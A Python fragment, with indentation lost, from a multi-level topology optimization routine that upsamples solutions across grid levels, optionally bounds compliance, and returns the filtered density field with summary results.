for level in range(params.numLevels):
print("*** Level " + str(level))
if x is not None:
# Upsample previous solution
x = images.upsample(x, nelx, nely)
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
x_comp = images.upsample(x_comp, nelx, nely)
gui = None
if params.hasGui:
gui = Gui(nelx, nely)
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
params.complianceMax = 0
solver = Solver(nelx, nely, params, ProblemType.Compliance, bc, gui)
x_comp = solver.optimize(x_comp)
min_compliance = solver.last_optimum_value()
params.complianceMax = min_compliance * params.complianceMaxFactor
print("")
# Solve problem
solver = Solver(nelx, nely, params, params.problemType, bc, gui)
x = solver.optimize(x, enforce_constraints=(level > 0))
if params.hasGui:
solver.filtering.filter_variables(x, solver.x_phys)
gui.update(solver.x_phys)
# Go to next level
if level < params.numLevels - 1:
nelx *= 2
nely *= 2
params.exemplarDownsampling /= 2.0
params.maxSolverStep //= 2
params.lengthSquare /= 2.0
print("")
# Filter last result to obtain physical variables
solver.filtering.filter_variables(x, solver.x_phys)
results = {
"last_optimum": solver.last_optimum_value(),
"volume": sum(solver.x_phys) / len(solver.x_phys)}
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
results["compliance_factor"] = solver.compliance_max / min_compliance
return (solver.x_phys, nelx, nely, results)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.